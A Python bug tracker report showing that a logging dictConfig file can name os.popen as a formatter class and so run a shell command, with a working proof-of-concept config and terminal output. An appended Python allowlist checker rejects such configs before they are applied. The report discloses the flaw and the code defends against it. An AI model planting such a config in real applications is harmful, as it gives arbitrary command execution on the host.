New submission from MarkBaggett <[email protected]>:
I know there are multiple warnings about the use of eval() in the listener. But
_resolve() and resolve(), used by both fileConfig and dictConfig, also seem like
they can be abused. Here is a working example.
$ ls /tmp/itworked
ls: cannot access '/tmp/itworked': No such file or directory
$ cat log.config
{
    "version": 1,
    "formatters": {
        "EXPLOIT": {
            "class": "os.popen",
            "format": "touch /tmp/itworked",
            "datefmt": "r",
            "style": 1
        }
    }
}
$ python calculator.py
/usr/lib/python3.8/subprocess.py:848: RuntimeWarning: line buffering
(buffering=1) isn't supported in binary mode, the default buffer size will be
used
self.stdout = io.open(c2pread, 'rb', bufsize)
WARNING:calculator.support_functions:Internet Confirmed.
WARNING:calculator.support_functions:Adder object exported!
WARNING:calculator.support_functions.adder:Set initial value to 0
WARNING:calculator:The result is 15
$ ls /tmp/itworked
/tmp/itworked
I could probably clean up that error message if I took 2 minutes to refresh my
os.popen knowledge, but I think you get the point. Are you aware of this issue?
Thanks for all you do on this important module!
----------
messages: 409623
nosy: MarkBaggett
priority: normal
severity: normal
status: open
title: logger.config.configure_formatter executes arbitrary code
type: security
versions: Python 3.10
_______________________________________
Python tracker <[email protected]>
<https://bugs.python.org/issue46251>
_______________________________________
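The report above shows why a dictConfig mapping that comes from anywhere outside the application's own source must be treated as code, not data: the "class" (and "()") keys of formatters, handlers and filters are passed through resolve(), which imports whatever dotted name is given, and "ext://" string values go through the same resolver. The following is an added example, written for this page and not code from the report or from CPython's logging package, of an allowlist check a deployment can run on such a mapping before handing it to logging.config.dictConfig(). ALLOWED_PREFIXES, ALLOWED_EXT_PREFIXES, find_untrusted_callables() and safe_dict_config() are names chosen here; MALICIOUS_CONFIG is the configuration from the report, and BENIGN_CONFIG is a constructed harmless one. The malicious mapping is only inspected, never applied.

```python
"""Allowlist check for logging dictConfig mappings before dictConfig() sees them.

Added example (not part of the bug report or of CPython). It refuses any
configuration whose "class"/"()" targets or "ext://" references point outside
an explicit allowlist, so a config such as the os.popen formatter from the
report is rejected before logging.config ever calls resolve() on it.
"""
import logging
import logging.config

# Assumption: this deployment only ever needs the standard library's logging
# classes (logging.Formatter, logging.StreamHandler, logging.handlers.*, ...).
ALLOWED_PREFIXES = ("logging.",)

# Assumption: the only "ext://" references we expect are sys.stdout/sys.stderr.
ALLOWED_EXT_PREFIXES = ("sys.stdout", "sys.stderr")

# dictConfig sections whose entries may name an importable callable.
CALLABLE_SECTIONS = ("formatters", "handlers", "filters")


def _walk_strings(obj, path=()):
    """Yield (dotted_path, value) for every string anywhere in a nested mapping."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from _walk_strings(value, path + (str(key),))
    elif isinstance(obj, (list, tuple)):
        for index, value in enumerate(obj):
            yield from _walk_strings(value, path + (str(index),))
    elif isinstance(obj, str):
        yield ".".join(path), obj


def find_untrusted_callables(config, allowed=ALLOWED_PREFIXES,
                             allowed_ext=ALLOWED_EXT_PREFIXES):
    """Return a list of (location, key, target) for everything dictConfig would
    resolve via import that is not covered by the allowlists. Empty list == clean."""
    violations = []
    # 1. "class" and "()" keys: dictConfig resolves these with resolve()/_resolve().
    for section in CALLABLE_SECTIONS:
        for name, entry in config.get(section, {}).items():
            if not isinstance(entry, dict):
                continue
            for key in ("class", "()"):
                if key not in entry:
                    continue
                target = entry[key]
                # A non-string target is an already-imported object supplied
                # from code; a string is resolved by import, so it must match.
                if not isinstance(target, str) or not target.startswith(allowed):
                    violations.append((f"{section}.{name}", key, target))
    # 2. "ext://name" string values anywhere: also resolved by import.
    for location, value in _walk_strings(config):
        if value.startswith("ext://") and not value[len("ext://"):].startswith(allowed_ext):
            violations.append((location, "ext://", value))
    return violations


def safe_dict_config(config):
    """Apply config with logging.config.dictConfig only if it passes the check."""
    violations = find_untrusted_callables(config)
    if violations:
        raise ValueError(f"refusing logging configuration: {violations}")
    logging.config.dictConfig(config)
    return True


# The formatter entry from the report: "class" is resolved to os.popen and the
# positional (fmt, datefmt, style) arguments become popen(cmd, mode, buffering).
MALICIOUS_CONFIG = {
    "version": 1,
    "formatters": {
        "EXPLOIT": {
            "class": "os.popen",
            "format": "touch /tmp/itworked",
            "datefmt": "r",
            "style": 1,
        }
    },
}

# Constructed harmless configuration using only stdlib logging classes.
BENIGN_CONFIG = {
    "version": 1,
    "disable_existing_loggers": False,
    "formatters": {"plain": {"format": "%(levelname)s:%(name)s:%(message)s"}},
    "handlers": {
        "console": {
            "class": "logging.StreamHandler",
            "formatter": "plain",
            "stream": "ext://sys.stderr",
        }
    },
}

if __name__ == "__main__":
    print("malicious:", find_untrusted_callables(MALICIOUS_CONFIG))
    print("benign:", find_untrusted_callables(BENIGN_CONFIG))
    safe_dict_config(BENIGN_CONFIG)
    logging.getLogger("example").warning("logging configured from allowlisted config")
```

The check runs before any import happens, so the exact class named in the configuration is irrelevant to its safety: anything outside the allowlist is refused, and a mapping built from untrusted input (a file fetched over the network, a value from an environment variable, a user-supplied JSON document) never reaches dictConfig's resolver. Widen ALLOWED_PREFIXES only with the specific third-party formatter or handler modules the application actually ships.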